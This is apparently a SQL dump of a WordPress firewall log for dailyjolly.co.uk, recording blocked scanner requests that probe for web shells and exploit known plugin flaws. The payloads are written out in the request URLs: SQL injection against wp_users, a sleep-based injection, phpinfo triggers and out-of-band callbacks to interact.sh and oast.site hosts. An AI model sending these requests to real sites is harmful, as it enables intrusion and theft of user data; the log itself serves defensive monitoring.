Safari\\/537.36\"}','ba3NJijR0lKSXGPCZwxBAHOt',0,1674797896.3271,167,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wsanon.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','4BXpzrdRsSb2qcDxgaJZ8Vyw',0,1674797898.3499,286,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Y5A8ZDOPENUqWLC67ulpdegc',0,1674797899.4811,323,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','w0yRs57JhfOiqvPMZGLAUoVl',0,1674797900.6792,162,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/ww.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','i0pWqXHUd9n52Q6tkwAJeacK',0,1674797901.5365,196,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','v2ojyfcnVkQlYxa1Ee0tbhWS',0,1674797902.5962,184,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/dev.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','EJxLtcZz8KrheQM56wAjy1qG',0,1674797906.9502,166,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-text/themes/seotheme/db.php?u','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','cmFMydpgXUixGCKIhvsLSrW4',0,1674797908.3700,211,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','IpvYURKeD5CMWncxrX8mJo37',0,1674797909.4944,201,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','f0pCRgBqoQi9DLNOwyG8jSMA',0,1674797910.3794,190,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/gly.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','28NqkbiHnVQB3cuZ0DxUIwyE',0,1674797911.7127,185,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/ahg.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','UvaGQ2cuS8Pg9d0A5xmz7wf6',0,1674797913.2184,169,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-loqin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8voHBd2aAUer5RfbNMkKTFs3',0,1674797915.5847,166,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/123.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','uYvHqBa0WdnPIt6hZFbl1xLN',0,1674797919.6256,163,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-confiq.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','k8zp6tqPxUAX71CmVofN9Wi3',0,1674797921.7842,171,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6q0ykJjv7PsbH5WImLdpweMn',0,1674797922.8292,168,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/xmrlpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0TGoQyhOvEr1Cc4NMLj8gUiI',0,1674797924.6927,194,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/phpinfo.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','c4n7GzMQBEyOvhtXAZHf5pPW',0,1674797926.2009,182,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3roG5029SbUOIRYiJeT7lHNx',0,1674797927.5060,168,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/configs.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','84IrfEZq6UcFChoeJdLjizDx',0,1674797928.4268,218,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-class.phtml','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9O5w7ZNxncXmDJP0udfFrYHv',0,1674797947.3931,193,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/about.phtml','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','sBFOY4LUxiRv2ehalgy7k0P8',0,1674797950.2665,224,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/xd.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Ky5jVwJQSmpLuv96eIqHTM12',0,1674797952.8965,178,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jp5kvV9rAIJhEdw4uQi0YfbO',0,1674797956.5615,204,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-admin/links.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','GQH7v1Kl0LRYVw3XTo89zSqb',0,1674797959.7840,164,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/hd.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2RkmwSlGs3i68gfpJvTc5AuE',0,1674797961.8468,165,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-rss.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','znpuhelBNZotJ2R1GTvUi6Fd',0,1674797972.5251,203,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jt78I2bPJAGzdZpvLh65gS1q',0,1674797981.8977,203,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/fuk.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pHG7fTlE5CLoMvZsV1S43Nqc',0,1674797982.8798,185,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-includes/IXR/db.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','uEqnY6IACdo0Lv8zOTmcr5te',0,1674797985.9121,212,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/seomarket.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YRrOw0AqcjeFUWuVZ94NtGy7',0,1674797987.4232,259,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/spamtools.be.txt.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','m9LWyX2xjnJvQzYkAGdh5CP1',0,1674797988.3664,181,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-text/themes/twentyfifteen/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','42lZwGPvXxoSBnqYVzheK1NO',0,1674797989.5898,172,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/request.php?jid=58','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','45NpBofcbweqx73hjmrJWSPX',0,1674797992.2544,173,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-text/plugins/jmb/edit-site.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','43yqEKoCMpxDF75hRbOs6VcA',0,1674797993.2618,177,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','LjAK6ynCkQqsGdi8RFxZfbM0',0,1674797994.1675,212,'','GET',403,0,700,0,1,'',0),('20.125.141.130',343772546,'','https://www.dailyjolly.co.uk/wp-text/themes/deep/local.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ZydrBYfKxelMGCapE7HcNk3Q',0,1674797995.1657,201,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1944.0 Safari\\/537.36\"}','oCGEjcnrikT4vqUFJsV72dPY',0,1674812766.9998,214,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.4; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','x24tADUkYH5Qic9drXGFLWnR',0,1674812766.8681,353,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-json/am-member/license','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.0 Safari\\/537.36\"}','TCEaU2lLzAG1bnoM3NIYmJ4K',0,1674812767.4823,259,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/40.0.2214.93 Safari\\/537.36\"}','uGe7qLI5HYpUfmXt8cnFxrS1',0,1674812767.5167,247,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/index.php?rest_route=/xs-donate-form/payment-redirect/3','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.3319.102 Safari\\/537.36\"}','v2AgPraFtcyMjZSoIuKLiQYq',0,1674812768.2255,237,'','GET',403,0,520,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','q2Dkc3I4CTHKUvgtyZQabmhE',0,1674812768.2254,247,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','EjkJ58fuCWmzTHPY93a46gyX',0,1674812768.8579,165,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.47 Safari\\/537.36\"}','f8w14YrIEcJdHhRsNSB2WkqV',0,1674812769.0709,185,'','GET',403,0,520,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\",\"2\":\"https:\\/\\/www.dailyjolly.co.uk:443\\/favicon.ico\"}','pmoyjXWLgnePKEVwz43H0aq6',0,1674812769.0479,273,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.0 Safari\\/537.36\"}','doFV6U29AvqIWwzC3mcf8uyp',0,1674812769.0717,270,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/?rest_route=/notificationx/v1/analytics','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2820.59 Safari\\/537.36\"}','QrY8ULecRAK4kX1oGTIqwhdW',0,1674812769.3073,273,'','POST',403,0,520,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-content/uploads/html2wp/2Ku7kikam14K7gl4bhAGGufbaqO.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','vH5rUbyewpmtZIoSXjYkifP3',0,1674812769.4007,252,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.2117.157 Safari\\/537.36\"}','EcQxYTorFeMNf6gDBUqaX1ik',0,1674812769.5378,189,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php?action=joomsport_md_load','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','cd5zWQbKRPvmlhU2XGtnsSek',0,1674812769.5375,212,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-admin/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','80JtUgMvTuxYmP5QA1CDRarp',0,1674812769.7391,196,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/index.php/video?dl=aHR0cDovL2ludGVyYWN0LnNoLw==','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.2117.157 Safari\\/537.36\"}','rR4yVnCW89UNGsQmhgL6Atbv',0,1674812769.9752,170,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/34.0.1847.137 Safari\\/4E423F\"}','zCIM7QBnhFYg98cVZ0f36ryS',0,1674812769.9752,191,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/?pid=0&uid=0&url=test&visitorId=1331\'+and+sleep(5)+or+\'&wmcAction=wmcTrack','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','shIQytK6CrEDw8aGVmJXcf4j',0,1674812769.9752,211,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/wpcargo/includes/2Ku7jgOFrto5l0xaiP8TRgaYMaX.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2049.0 Safari\\/537.36\"}','8BTLvxcsHKF40R3qYENWIuU5',0,1674812770.1669,194,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','0IZOA93nx2lTdg1GHbptQeuV',0,1674812770.1669,231,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 4.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2049.0 Safari\\/537.36\"}','qZW9UeYz7a2xslApohD8bPyd',0,1674812769.9752,449,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\"}','3YUdpmMXnzR42WJQyuSGsPIc',0,1674812770.3241,264,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/simple-file-list/ee-file-engine.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.0 Safari\\/537.36\"}','9GHMTavBq4UdKptFDA1CxYJf',0,1674812770.3713,243,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/?rest_route=/olistener/new','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.47 Safari\\/537.36\"}','1hzFG46xstiUbo7I23rJTXnv',0,1674812770.4124,256,'','POST',403,0,520,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php?action=easync_success_and_save','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/34.0.1866.237 Safari\\/537.36\"}','e3n0ubIMPCfdaiSmycT4Blwz',0,1674812770.5109,255,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-post.php?vrc_cmd=phpinfo','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.1 Safari\\/537.36\"}','hDgpJUaReVoXtAlwsZW12Qcf',0,1674812770.6307,258,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/wp-payeezy-pay/donate.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2919.83 Safari\\/537.36\"}','pJ3mCA4Hb8RSk9eEYi5wonyX',0,1674812770.6308,260,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\",\"2\":\"https:\\/\\/www.dailyjolly.co.uk:443\"}','YiUt3JvzoLhErGk9PMX1lKBx',0,1674812770.6308,286,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/imagements/images/2ku7keawec0uacjr9yzike6zwyc.php','','{\"1\":\"Mozilla\\/5.0 (X11; OpenBSD i386) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','hGBefVL68C1R42SEYZHoXUda',0,1674812770.8678,220,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/wpcargo/includes/barcode.php?filepath=2Ku7jgOFrto5l0xaiP8TRgaYMaX.php&size=1&sizefactor=.090909090909&text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','iVGPtT5SB3JqLfCwRW7ouZpg',0,1674812770.8679,233,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-content/uploads/simple-file-list/nuclei.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\"}','sMmE7tSKiVIRrUkALFPgfB2T',0,1674812770.8723,252,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-content/uploads/workreap-temp/2Ku7kjV6ASJLEBny2yxu9YL776S.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','5hadSmt8XoYNLljiT6sqB3wf',0,1674812770.6721,452,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2820.59 Safari\\/537.36\"}','RuTlaksIiMYHn5XtvJqDBUW6',0,1674812771.2359,204,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-content/plugins/wpcargo/includes/2Ku7jgOFrto5l0xaiP8TRgaYMaX.php?1=var_dump','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/34.0.1866.237 Safari\\/537.36\"}','cG8VT49h7WQgnHq1pmvylPAC',0,1674812771.3803,172,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-content/uploads/kaswara/fonts_icon/syvwmp/zz.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2062.124 Safari\\/537.36\"}','a1wB5keq7gyrh3liofndcVYu',0,1674812771.3804,245,'','GET',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/wp-admin/admin-ajax.php?action=moove_read_xml','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.47 Safari\\/537.36\"}','fRuxlS4Z7MTpv1D0wi58FW2e',0,1674812772.0200,163,'','POST',403,0,700,0,1,'',0),('185.65.134.167',3108079271,'','https://www.dailyjolly.co.uk/favicon.ico/?qtproxycall=http://cf9pqni9k8ibnq800010nr9wjmkjmk5zd.oast.site','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 